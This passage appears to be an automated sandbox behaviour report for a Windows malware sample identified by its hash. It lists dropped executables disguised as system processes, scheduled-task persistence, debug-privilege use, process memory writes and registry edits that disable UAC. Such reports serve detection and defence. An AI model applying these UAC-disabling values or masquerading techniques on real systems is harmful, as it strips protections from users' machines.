File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Setup Files\886983d96e3d3e	d80fa7b3ff6a9ccf612307c00a81e470e63c53c6d3370ea7f5490de4f5f477ce.exe
File opened for modification	C:\Program Files (x86)\Windows Portable Devices\RCXBD01.tmp	d80fa7b3ff6a9ccf612307c00a81e470e63c53c6d3370ea7f5490de4f5f477ce.exe
File opened for modification	C:\Program Files\Windows Portable Devices\RCXC206.tmp	d80fa7b3ff6a9ccf612307c00a81e470e63c53c6d3370ea7f5490de4f5f477ce.exe
File opened for modification	C:\Program Files\Windows Media Player\Network Sharing\RCXCBE3.tmp	d80fa7b3ff6a9ccf612307c00a81e470e63c53c6d3370ea7f5490de4f5f477ce.exe
File created	C:\Program Files\Windows Media Player\Network Sharing\sppsvc.exe	d80fa7b3ff6a9ccf612307c00a81e470e63c53c6d3370ea7f5490de4f5f477ce.exe
File opened for modification	C:\Program Files\Windows Portable Devices\taskhostw.exe	d80fa7b3ff6a9ccf612307c00a81e470e63c53c6d3370ea7f5490de4f5f477ce.exe
File opened for modification	C:\Program Files\Reference Assemblies\Microsoft\Framework\RCXC74B.tmp	d80fa7b3ff6a9ccf612307c00a81e470e63c53c6d3370ea7f5490de4f5f477ce.exe
File opened for modification	C:\Program Files\Reference Assemblies\Microsoft\Framework\sihost.exe	d80fa7b3ff6a9ccf612307c00a81e470e63c53c6d3370ea7f5490de4f5f477ce.exe
File opened for modification	C:\Program Files\Windows Media Player\Network Sharing\sppsvc.exe	d80fa7b3ff6a9ccf612307c00a81e470e63c53c6d3370ea7f5490de4f5f477ce.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Setup Files\csrss.exe	d80fa7b3ff6a9ccf612307c00a81e470e63c53c6d3370ea7f5490de4f5f477ce.exe
File created	C:\Program Files\Windows Portable Devices\taskhostw.exe	d80fa7b3ff6a9ccf612307c00a81e470e63c53c6d3370ea7f5490de4f5f477ce.exe
File created	C:\Program Files\Reference Assemblies\Microsoft\Framework\66fc9ff0ee96c2	d80fa7b3ff6a9ccf612307c00a81e470e63c53c6d3370ea7f5490de4f5f477ce.exe
File created	C:\Program Files\Windows Media Player\Network Sharing\0a1fd5f707cd16	d80fa7b3ff6a9ccf612307c00a81e470e63c53c6d3370ea7f5490de4f5f477ce.exe
File opened for modification	C:\Program Files (x86)\Windows Portable Devices\RCXBD02.tmp	d80fa7b3ff6a9ccf612307c00a81e470e63c53c6d3370ea7f5490de4f5f477ce.exe
File opened for modification	C:\Program Files\Internet Explorer\SIGNUP\sppsvc.exe	d80fa7b3ff6a9ccf612307c00a81e470e63c53c6d3370ea7f5490de4f5f477ce.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\ja-JP\RCXD06A.tmp	d80fa7b3ff6a9ccf612307c00a81e470e63c53c6d3370ea7f5490de4f5f477ce.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\ja-JP\Idle.exe	d80fa7b3ff6a9ccf612307c00a81e470e63c53c6d3370ea7f5490de4f5f477ce.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Setup Files\RCXB410.tmp	d80fa7b3ff6a9ccf612307c00a81e470e63c53c6d3370ea7f5490de4f5f477ce.exe
File opened for modification	C:\Program Files (x86)\Windows Portable Devices\Registry.exe	d80fa7b3ff6a9ccf612307c00a81e470e63c53c6d3370ea7f5490de4f5f477ce.exe
File opened for modification	C:\Program Files\Reference Assemblies\Microsoft\Framework\RCXC6CD.tmp	d80fa7b3ff6a9ccf612307c00a81e470e63c53c6d3370ea7f5490de4f5f477ce.exe
File opened for modification	C:\Program Files\WindowsPowerShell\explorer.exe	d80fa7b3ff6a9ccf612307c00a81e470e63c53c6d3370ea7f5490de4f5f477ce.exe
File created	C:\Program Files (x86)\Windows Portable Devices\Registry.exe	d80fa7b3ff6a9ccf612307c00a81e470e63c53c6d3370ea7f5490de4f5f477ce.exe
File opened for modification	C:\Program Files\Windows Media Player\Network Sharing\RCXCB65.tmp	d80fa7b3ff6a9ccf612307c00a81e470e63c53c6d3370ea7f5490de4f5f477ce.exe
File created	C:\Program Files\Crashpad\reports\wininit.exe	d80fa7b3ff6a9ccf612307c00a81e470e63c53c6d3370ea7f5490de4f5f477ce.exe
File opened for modification	C:\Program Files\Crashpad\reports\wininit.exe	d80fa7b3ff6a9ccf612307c00a81e470e63c53c6d3370ea7f5490de4f5f477ce.exe
File created	C:\Program Files\WindowsPowerShell\explorer.exe	d80fa7b3ff6a9ccf612307c00a81e470e63c53c6d3370ea7f5490de4f5f477ce.exe
File created	C:\Program Files\WindowsPowerShell\7a0fd90576e088	d80fa7b3ff6a9ccf612307c00a81e470e63c53c6d3370ea7f5490de4f5f477ce.exe
File created	C:\Program Files (x86)\Windows Portable Devices\ee2ad38f3d4382	d80fa7b3ff6a9ccf612307c00a81e470e63c53c6d3370ea7f5490de4f5f477ce.exe
File created	C:\Program Files\Windows Portable Devices\ea9f0e6c9e2dcd	d80fa7b3ff6a9ccf612307c00a81e470e63c53c6d3370ea7f5490de4f5f477ce.exe
File created	C:\Program Files\Reference Assemblies\Microsoft\Framework\sihost.exe	d80fa7b3ff6a9ccf612307c00a81e470e63c53c6d3370ea7f5490de4f5f477ce.exe
File created	C:\Program Files (x86)\Windows Defender\ja-JP\6ccacd8608530f	d80fa7b3ff6a9ccf612307c00a81e470e63c53c6d3370ea7f5490de4f5f477ce.exe
File opened for modification	C:\Program Files\Windows Portable Devices\RCXC284.tmp	d80fa7b3ff6a9ccf612307c00a81e470e63c53c6d3370ea7f5490de4f5f477ce.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\ja-JP\RCXD06B.tmp	d80fa7b3ff6a9ccf612307c00a81e470e63c53c6d3370ea7f5490de4f5f477ce.exe
File created	C:\Program Files\Crashpad\reports\56085415360792	d80fa7b3ff6a9ccf612307c00a81e470e63c53c6d3370ea7f5490de4f5f477ce.exe

Drops file in Windows directory 15 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Prefetch\ReadyBoot\dwm.exe	d80fa7b3ff6a9ccf612307c00a81e470e63c53c6d3370ea7f5490de4f5f477ce.exe
File created	C:\Windows\Prefetch\ReadyBoot\6cb0b6c459d5d3	d80fa7b3ff6a9ccf612307c00a81e470e63c53c6d3370ea7f5490de4f5f477ce.exe
File created	C:\Windows\PolicyDefinitions\uk-UA\dwm.exe	d80fa7b3ff6a9ccf612307c00a81e470e63c53c6d3370ea7f5490de4f5f477ce.exe
File created	C:\Windows\PolicyDefinitions\uk-UA\6cb0b6c459d5d3	d80fa7b3ff6a9ccf612307c00a81e470e63c53c6d3370ea7f5490de4f5f477ce.exe
File created	C:\Windows\WinSxS\amd64_dc1-controller.inf.resources_31bf3856ad364e35_10.0.19041.1_uk-ua_523ea2d8b406baa8\explorer.exe	d80fa7b3ff6a9ccf612307c00a81e470e63c53c6d3370ea7f5490de4f5f477ce.exe
File opened for modification	C:\Windows\PolicyDefinitions\uk-UA\RCXC001.tmp	d80fa7b3ff6a9ccf612307c00a81e470e63c53c6d3370ea7f5490de4f5f477ce.exe
File created	C:\Windows\rescache\_merged\4245263321\System.exe	d80fa7b3ff6a9ccf612307c00a81e470e63c53c6d3370ea7f5490de4f5f477ce.exe
File opened for modification	C:\Windows\Prefetch\ReadyBoot\RCXBA4F.tmp	d80fa7b3ff6a9ccf612307c00a81e470e63c53c6d3370ea7f5490de4f5f477ce.exe
File created	C:\Windows\en-US\121e5b5079f7c0	d80fa7b3ff6a9ccf612307c00a81e470e63c53c6d3370ea7f5490de4f5f477ce.exe
File opened for modification	C:\Windows\PolicyDefinitions\uk-UA\dwm.exe	d80fa7b3ff6a9ccf612307c00a81e470e63c53c6d3370ea7f5490de4f5f477ce.exe
File created	C:\Windows\en-US\sysmon.exe	d80fa7b3ff6a9ccf612307c00a81e470e63c53c6d3370ea7f5490de4f5f477ce.exe
File opened for modification	C:\Windows\en-US\sysmon.exe	d80fa7b3ff6a9ccf612307c00a81e470e63c53c6d3370ea7f5490de4f5f477ce.exe
File created	C:\Windows\Prefetch\ReadyBoot\dwm.exe	d80fa7b3ff6a9ccf612307c00a81e470e63c53c6d3370ea7f5490de4f5f477ce.exe
File opened for modification	C:\Windows\Prefetch\ReadyBoot\RCXBACD.tmp	d80fa7b3ff6a9ccf612307c00a81e470e63c53c6d3370ea7f5490de4f5f477ce.exe
File opened for modification	C:\Windows\PolicyDefinitions\uk-UA\RCXBF83.tmp	d80fa7b3ff6a9ccf612307c00a81e470e63c53c6d3370ea7f5490de4f5f477ce.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Modifies registry class 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings	d80fa7b3ff6a9ccf612307c00a81e470e63c53c6d3370ea7f5490de4f5f477ce.exe
Key created	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings	d80fa7b3ff6a9ccf612307c00a81e470e63c53c6d3370ea7f5490de4f5f477ce.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 57 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
4412	schtasks.exe
4680	schtasks.exe
3460	schtasks.exe
3304	schtasks.exe
1788	schtasks.exe
4280	schtasks.exe
3432	schtasks.exe
4132	schtasks.exe
3932	schtasks.exe
4224	schtasks.exe
4184	schtasks.exe
712	schtasks.exe
4332	schtasks.exe
3300	schtasks.exe
1164	schtasks.exe
820	schtasks.exe
4156	schtasks.exe
1576	schtasks.exe
3092	schtasks.exe
4232	schtasks.exe
1552	schtasks.exe
1208	schtasks.exe
4872	schtasks.exe
2736	schtasks.exe
2500	schtasks.exe
2492	schtasks.exe
3572	schtasks.exe
1536	schtasks.exe
4836	schtasks.exe
228	schtasks.exe
1888	schtasks.exe
3476	schtasks.exe
3972	schtasks.exe
2812	schtasks.exe
4088	schtasks.exe
436	schtasks.exe
3436	schtasks.exe
4100	schtasks.exe
3672	schtasks.exe
3496	schtasks.exe
2560	schtasks.exe
3488	schtasks.exe
4160	schtasks.exe
1584	schtasks.exe
3056	schtasks.exe
3788	schtasks.exe
3540	schtasks.exe
1996	schtasks.exe
4952	schtasks.exe
2128	schtasks.exe
3012	schtasks.exe
3180	schtasks.exe
3556	schtasks.exe
3540	schtasks.exe
2780	schtasks.exe
3520	schtasks.exe
1436	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
3568	d80fa7b3ff6a9ccf612307c00a81e470e63c53c6d3370ea7f5490de4f5f477ce.exe
3568	d80fa7b3ff6a9ccf612307c00a81e470e63c53c6d3370ea7f5490de4f5f477ce.exe
3568	d80fa7b3ff6a9ccf612307c00a81e470e63c53c6d3370ea7f5490de4f5f477ce.exe
3568	d80fa7b3ff6a9ccf612307c00a81e470e63c53c6d3370ea7f5490de4f5f477ce.exe
3568	d80fa7b3ff6a9ccf612307c00a81e470e63c53c6d3370ea7f5490de4f5f477ce.exe
3568	d80fa7b3ff6a9ccf612307c00a81e470e63c53c6d3370ea7f5490de4f5f477ce.exe
3568	d80fa7b3ff6a9ccf612307c00a81e470e63c53c6d3370ea7f5490de4f5f477ce.exe
3568	d80fa7b3ff6a9ccf612307c00a81e470e63c53c6d3370ea7f5490de4f5f477ce.exe
3568	d80fa7b3ff6a9ccf612307c00a81e470e63c53c6d3370ea7f5490de4f5f477ce.exe
3568	d80fa7b3ff6a9ccf612307c00a81e470e63c53c6d3370ea7f5490de4f5f477ce.exe
3568	d80fa7b3ff6a9ccf612307c00a81e470e63c53c6d3370ea7f5490de4f5f477ce.exe
3568	d80fa7b3ff6a9ccf612307c00a81e470e63c53c6d3370ea7f5490de4f5f477ce.exe
3568	d80fa7b3ff6a9ccf612307c00a81e470e63c53c6d3370ea7f5490de4f5f477ce.exe
3568	d80fa7b3ff6a9ccf612307c00a81e470e63c53c6d3370ea7f5490de4f5f477ce.exe
3568	d80fa7b3ff6a9ccf612307c00a81e470e63c53c6d3370ea7f5490de4f5f477ce.exe
3568	d80fa7b3ff6a9ccf612307c00a81e470e63c53c6d3370ea7f5490de4f5f477ce.exe
3568	d80fa7b3ff6a9ccf612307c00a81e470e63c53c6d3370ea7f5490de4f5f477ce.exe
3568	d80fa7b3ff6a9ccf612307c00a81e470e63c53c6d3370ea7f5490de4f5f477ce.exe
3568	d80fa7b3ff6a9ccf612307c00a81e470e63c53c6d3370ea7f5490de4f5f477ce.exe
3568	d80fa7b3ff6a9ccf612307c00a81e470e63c53c6d3370ea7f5490de4f5f477ce.exe
3568	d80fa7b3ff6a9ccf612307c00a81e470e63c53c6d3370ea7f5490de4f5f477ce.exe
3568	d80fa7b3ff6a9ccf612307c00a81e470e63c53c6d3370ea7f5490de4f5f477ce.exe
3568	d80fa7b3ff6a9ccf612307c00a81e470e63c53c6d3370ea7f5490de4f5f477ce.exe
3568	d80fa7b3ff6a9ccf612307c00a81e470e63c53c6d3370ea7f5490de4f5f477ce.exe
3568	d80fa7b3ff6a9ccf612307c00a81e470e63c53c6d3370ea7f5490de4f5f477ce.exe
3568	d80fa7b3ff6a9ccf612307c00a81e470e63c53c6d3370ea7f5490de4f5f477ce.exe
3568	d80fa7b3ff6a9ccf612307c00a81e470e63c53c6d3370ea7f5490de4f5f477ce.exe
3568	d80fa7b3ff6a9ccf612307c00a81e470e63c53c6d3370ea7f5490de4f5f477ce.exe
3568	d80fa7b3ff6a9ccf612307c00a81e470e63c53c6d3370ea7f5490de4f5f477ce.exe
3568	d80fa7b3ff6a9ccf612307c00a81e470e63c53c6d3370ea7f5490de4f5f477ce.exe
3568	d80fa7b3ff6a9ccf612307c00a81e470e63c53c6d3370ea7f5490de4f5f477ce.exe
3568	d80fa7b3ff6a9ccf612307c00a81e470e63c53c6d3370ea7f5490de4f5f477ce.exe
3568	d80fa7b3ff6a9ccf612307c00a81e470e63c53c6d3370ea7f5490de4f5f477ce.exe
3568	d80fa7b3ff6a9ccf612307c00a81e470e63c53c6d3370ea7f5490de4f5f477ce.exe
3568	d80fa7b3ff6a9ccf612307c00a81e470e63c53c6d3370ea7f5490de4f5f477ce.exe
3568	d80fa7b3ff6a9ccf612307c00a81e470e63c53c6d3370ea7f5490de4f5f477ce.exe
3568	d80fa7b3ff6a9ccf612307c00a81e470e63c53c6d3370ea7f5490de4f5f477ce.exe
3568	d80fa7b3ff6a9ccf612307c00a81e470e63c53c6d3370ea7f5490de4f5f477ce.exe
3568	d80fa7b3ff6a9ccf612307c00a81e470e63c53c6d3370ea7f5490de4f5f477ce.exe
3568	d80fa7b3ff6a9ccf612307c00a81e470e63c53c6d3370ea7f5490de4f5f477ce.exe
3568	d80fa7b3ff6a9ccf612307c00a81e470e63c53c6d3370ea7f5490de4f5f477ce.exe
3568	d80fa7b3ff6a9ccf612307c00a81e470e63c53c6d3370ea7f5490de4f5f477ce.exe
3568	d80fa7b3ff6a9ccf612307c00a81e470e63c53c6d3370ea7f5490de4f5f477ce.exe
3568	d80fa7b3ff6a9ccf612307c00a81e470e63c53c6d3370ea7f5490de4f5f477ce.exe
3568	d80fa7b3ff6a9ccf612307c00a81e470e63c53c6d3370ea7f5490de4f5f477ce.exe
3568	d80fa7b3ff6a9ccf612307c00a81e470e63c53c6d3370ea7f5490de4f5f477ce.exe
3568	d80fa7b3ff6a9ccf612307c00a81e470e63c53c6d3370ea7f5490de4f5f477ce.exe
3568	d80fa7b3ff6a9ccf612307c00a81e470e63c53c6d3370ea7f5490de4f5f477ce.exe
3568	d80fa7b3ff6a9ccf612307c00a81e470e63c53c6d3370ea7f5490de4f5f477ce.exe
3568	d80fa7b3ff6a9ccf612307c00a81e470e63c53c6d3370ea7f5490de4f5f477ce.exe
3568	d80fa7b3ff6a9ccf612307c00a81e470e63c53c6d3370ea7f5490de4f5f477ce.exe
3568	d80fa7b3ff6a9ccf612307c00a81e470e63c53c6d3370ea7f5490de4f5f477ce.exe
3568	d80fa7b3ff6a9ccf612307c00a81e470e63c53c6d3370ea7f5490de4f5f477ce.exe
3568	d80fa7b3ff6a9ccf612307c00a81e470e63c53c6d3370ea7f5490de4f5f477ce.exe
3568	d80fa7b3ff6a9ccf612307c00a81e470e63c53c6d3370ea7f5490de4f5f477ce.exe
3568	d80fa7b3ff6a9ccf612307c00a81e470e63c53c6d3370ea7f5490de4f5f477ce.exe
3568	d80fa7b3ff6a9ccf612307c00a81e470e63c53c6d3370ea7f5490de4f5f477ce.exe
3568	d80fa7b3ff6a9ccf612307c00a81e470e63c53c6d3370ea7f5490de4f5f477ce.exe
3568	d80fa7b3ff6a9ccf612307c00a81e470e63c53c6d3370ea7f5490de4f5f477ce.exe
3568	d80fa7b3ff6a9ccf612307c00a81e470e63c53c6d3370ea7f5490de4f5f477ce.exe
3568	d80fa7b3ff6a9ccf612307c00a81e470e63c53c6d3370ea7f5490de4f5f477ce.exe
3568	d80fa7b3ff6a9ccf612307c00a81e470e63c53c6d3370ea7f5490de4f5f477ce.exe
4268	powershell.exe
4268	powershell.exe

Suspicious use of AdjustPrivilegeToken 43 IoCs

description	pid	Process
Token: SeDebugPrivilege	3568	d80fa7b3ff6a9ccf612307c00a81e470e63c53c6d3370ea7f5490de4f5f477ce.exe
Token: SeDebugPrivilege	4268	powershell.exe
Token: SeDebugPrivilege	4884	powershell.exe
Token: SeDebugPrivilege	4896	powershell.exe
Token: SeDebugPrivilege	2420	powershell.exe
Token: SeDebugPrivilege	2684	powershell.exe
Token: SeDebugPrivilege	4464	powershell.exe
Token: SeDebugPrivilege	1844	powershell.exe
Token: SeDebugPrivilege	2460	powershell.exe
Token: SeDebugPrivilege	4436	powershell.exe
Token: SeDebugPrivilege	3784	powershell.exe
Token: SeDebugPrivilege	1896	powershell.exe
Token: SeDebugPrivilege	492	d80fa7b3ff6a9ccf612307c00a81e470e63c53c6d3370ea7f5490de4f5f477ce.exe
Token: SeDebugPrivilege	1608	powershell.exe
Token: SeDebugPrivilege	4132	powershell.exe
Token: SeDebugPrivilege	4252	powershell.exe
Token: SeDebugPrivilege	4680	powershell.exe
Token: SeDebugPrivilege	2420	powershell.exe
Token: SeDebugPrivilege	1556	powershell.exe
Token: SeDebugPrivilege	2800	powershell.exe
Token: SeDebugPrivilege	4952	powershell.exe
Token: SeDebugPrivilege	4812	powershell.exe
Token: SeDebugPrivilege	3460	powershell.exe
Token: SeDebugPrivilege	1776	powershell.exe
Token: SeDebugPrivilege	1584	wininit.exe
Token: SeDebugPrivilege	424	sihost.exe
Token: SeDebugPrivilege	1896	lsass.exe
Token: SeDebugPrivilege	1816	unsecapp.exe
Token: SeDebugPrivilege	4744	System.exe
Token: SeDebugPrivilege	3740	Registry.exe
Token: SeDebugPrivilege	3468	d80fa7b3ff6a9ccf612307c00a81e470e63c53c6d3370ea7f5490de4f5f477ce.exe
Token: SeDebugPrivilege	1444	sihost.exe
Token: SeDebugPrivilege	1216	sppsvc.exe
Token: SeDebugPrivilege	564	winlogon.exe
Token: SeDebugPrivilege	1116	explorer.exe
Token: SeDebugPrivilege	4268	dwm.exe
Token: SeDebugPrivilege	2868	Idle.exe
Token: SeDebugPrivilege	2552	wininit.exe
Token: SeDebugPrivilege	2812	csrss.exe
Token: SeDebugPrivilege	3040	dllhost.exe
Token: SeDebugPrivilege	2904	sysmon.exe
Token: SeDebugPrivilege	2200	taskhostw.exe
Token: SeDebugPrivilege	3544	sihost.exe

Suspicious use of WriteProcessMemory 56 IoCs

description	pid	Process	procid_target
PID 3568 wrote to memory of 4268	3568	d80fa7b3ff6a9ccf612307c00a81e470e63c53c6d3370ea7f5490de4f5f477ce.exe	133
PID 3568 wrote to memory of 4268	3568	d80fa7b3ff6a9ccf612307c00a81e470e63c53c6d3370ea7f5490de4f5f477ce.exe	133
PID 3568 wrote to memory of 4884	3568	d80fa7b3ff6a9ccf612307c00a81e470e63c53c6d3370ea7f5490de4f5f477ce.exe	134
PID 3568 wrote to memory of 4884	3568	d80fa7b3ff6a9ccf612307c00a81e470e63c53c6d3370ea7f5490de4f5f477ce.exe	134
PID 3568 wrote to memory of 2420	3568	d80fa7b3ff6a9ccf612307c00a81e470e63c53c6d3370ea7f5490de4f5f477ce.exe	135
PID 3568 wrote to memory of 2420	3568	d80fa7b3ff6a9ccf612307c00a81e470e63c53c6d3370ea7f5490de4f5f477ce.exe	135
PID 3568 wrote to memory of 1896	3568	d80fa7b3ff6a9ccf612307c00a81e470e63c53c6d3370ea7f5490de4f5f477ce.exe	136
PID 3568 wrote to memory of 1896	3568	d80fa7b3ff6a9ccf612307c00a81e470e63c53c6d3370ea7f5490de4f5f477ce.exe	136
PID 3568 wrote to memory of 4436	3568	d80fa7b3ff6a9ccf612307c00a81e470e63c53c6d3370ea7f5490de4f5f477ce.exe	137
PID 3568 wrote to memory of 4436	3568	d80fa7b3ff6a9ccf612307c00a81e470e63c53c6d3370ea7f5490de4f5f477ce.exe	137
PID 3568 wrote to memory of 4896	3568	d80fa7b3ff6a9ccf612307c00a81e470e63c53c6d3370ea7f5490de4f5f477ce.exe	138
PID 3568 wrote to memory of 4896	3568	d80fa7b3ff6a9ccf612307c00a81e470e63c53c6d3370ea7f5490de4f5f477ce.exe	138
PID 3568 wrote to memory of 4464	3568	d80fa7b3ff6a9ccf612307c00a81e470e63c53c6d3370ea7f5490de4f5f477ce.exe	139
PID 3568 wrote to memory of 4464	3568	d80fa7b3ff6a9ccf612307c00a81e470e63c53c6d3370ea7f5490de4f5f477ce.exe	139
PID 3568 wrote to memory of 2684	3568	d80fa7b3ff6a9ccf612307c00a81e470e63c53c6d3370ea7f5490de4f5f477ce.exe	140
PID 3568 wrote to memory of 2684	3568	d80fa7b3ff6a9ccf612307c00a81e470e63c53c6d3370ea7f5490de4f5f477ce.exe	140
PID 3568 wrote to memory of 3784	3568	d80fa7b3ff6a9ccf612307c00a81e470e63c53c6d3370ea7f5490de4f5f477ce.exe	141
PID 3568 wrote to memory of 3784	3568	d80fa7b3ff6a9ccf612307c00a81e470e63c53c6d3370ea7f5490de4f5f477ce.exe	141
PID 3568 wrote to memory of 1844	3568	d80fa7b3ff6a9ccf612307c00a81e470e63c53c6d3370ea7f5490de4f5f477ce.exe	142
PID 3568 wrote to memory of 1844	3568	d80fa7b3ff6a9ccf612307c00a81e470e63c53c6d3370ea7f5490de4f5f477ce.exe	142
PID 3568 wrote to memory of 2460	3568	d80fa7b3ff6a9ccf612307c00a81e470e63c53c6d3370ea7f5490de4f5f477ce.exe	143
PID 3568 wrote to memory of 2460	3568	d80fa7b3ff6a9ccf612307c00a81e470e63c53c6d3370ea7f5490de4f5f477ce.exe	143
PID 3568 wrote to memory of 5100	3568	d80fa7b3ff6a9ccf612307c00a81e470e63c53c6d3370ea7f5490de4f5f477ce.exe	154
PID 3568 wrote to memory of 5100	3568	d80fa7b3ff6a9ccf612307c00a81e470e63c53c6d3370ea7f5490de4f5f477ce.exe	154
PID 5100 wrote to memory of 4148	5100	cmd.exe	157
PID 5100 wrote to memory of 4148	5100	cmd.exe	157
PID 5100 wrote to memory of 492	5100	cmd.exe	165
PID 5100 wrote to memory of 492	5100	cmd.exe	165
PID 492 wrote to memory of 4132	492	d80fa7b3ff6a9ccf612307c00a81e470e63c53c6d3370ea7f5490de4f5f477ce.exe	181
PID 492 wrote to memory of 4132	492	d80fa7b3ff6a9ccf612307c00a81e470e63c53c6d3370ea7f5490de4f5f477ce.exe	181
PID 492 wrote to memory of 4252	492	d80fa7b3ff6a9ccf612307c00a81e470e63c53c6d3370ea7f5490de4f5f477ce.exe	182
PID 492 wrote to memory of 4252	492	d80fa7b3ff6a9ccf612307c00a81e470e63c53c6d3370ea7f5490de4f5f477ce.exe	182
PID 492 wrote to memory of 4680	492	d80fa7b3ff6a9ccf612307c00a81e470e63c53c6d3370ea7f5490de4f5f477ce.exe	183
PID 492 wrote to memory of 4680	492	d80fa7b3ff6a9ccf612307c00a81e470e63c53c6d3370ea7f5490de4f5f477ce.exe	183
PID 492 wrote to memory of 1608	492	d80fa7b3ff6a9ccf612307c00a81e470e63c53c6d3370ea7f5490de4f5f477ce.exe	184
PID 492 wrote to memory of 1608	492	d80fa7b3ff6a9ccf612307c00a81e470e63c53c6d3370ea7f5490de4f5f477ce.exe	184
PID 492 wrote to memory of 1776	492	d80fa7b3ff6a9ccf612307c00a81e470e63c53c6d3370ea7f5490de4f5f477ce.exe	186
PID 492 wrote to memory of 1776	492	d80fa7b3ff6a9ccf612307c00a81e470e63c53c6d3370ea7f5490de4f5f477ce.exe	186
PID 492 wrote to memory of 4812	492	d80fa7b3ff6a9ccf612307c00a81e470e63c53c6d3370ea7f5490de4f5f477ce.exe	187
PID 492 wrote to memory of 4812	492	d80fa7b3ff6a9ccf612307c00a81e470e63c53c6d3370ea7f5490de4f5f477ce.exe	187
PID 492 wrote to memory of 1556	492	d80fa7b3ff6a9ccf612307c00a81e470e63c53c6d3370ea7f5490de4f5f477ce.exe	188
PID 492 wrote to memory of 1556	492	d80fa7b3ff6a9ccf612307c00a81e470e63c53c6d3370ea7f5490de4f5f477ce.exe	188
PID 492 wrote to memory of 2800	492	d80fa7b3ff6a9ccf612307c00a81e470e63c53c6d3370ea7f5490de4f5f477ce.exe	189
PID 492 wrote to memory of 2800	492	d80fa7b3ff6a9ccf612307c00a81e470e63c53c6d3370ea7f5490de4f5f477ce.exe	189
PID 492 wrote to memory of 3460	492	d80fa7b3ff6a9ccf612307c00a81e470e63c53c6d3370ea7f5490de4f5f477ce.exe	191
PID 492 wrote to memory of 3460	492	d80fa7b3ff6a9ccf612307c00a81e470e63c53c6d3370ea7f5490de4f5f477ce.exe	191
PID 492 wrote to memory of 2420	492	d80fa7b3ff6a9ccf612307c00a81e470e63c53c6d3370ea7f5490de4f5f477ce.exe	192
PID 492 wrote to memory of 2420	492	d80fa7b3ff6a9ccf612307c00a81e470e63c53c6d3370ea7f5490de4f5f477ce.exe	192
PID 492 wrote to memory of 4952	492	d80fa7b3ff6a9ccf612307c00a81e470e63c53c6d3370ea7f5490de4f5f477ce.exe	194
PID 492 wrote to memory of 4952	492	d80fa7b3ff6a9ccf612307c00a81e470e63c53c6d3370ea7f5490de4f5f477ce.exe	194
PID 492 wrote to memory of 3188	492	d80fa7b3ff6a9ccf612307c00a81e470e63c53c6d3370ea7f5490de4f5f477ce.exe	203
PID 492 wrote to memory of 3188	492	d80fa7b3ff6a9ccf612307c00a81e470e63c53c6d3370ea7f5490de4f5f477ce.exe	203
PID 3188 wrote to memory of 1696	3188	cmd.exe	205
PID 3188 wrote to memory of 1696	3188	cmd.exe	205
PID 3188 wrote to memory of 1584	3188	cmd.exe	209
PID 3188 wrote to memory of 1584	3188	cmd.exe	209

System policy modification 1 TTPs 57 IoCs

evasion

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	csrss.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	lsass.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	explorer.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	sihost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	unsecapp.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	unsecapp.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	sppsvc.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	winlogon.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	wininit.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	wininit.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	winlogon.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	taskhostw.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	lsass.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	System.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	wininit.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	wininit.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	sihost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	lsass.exe
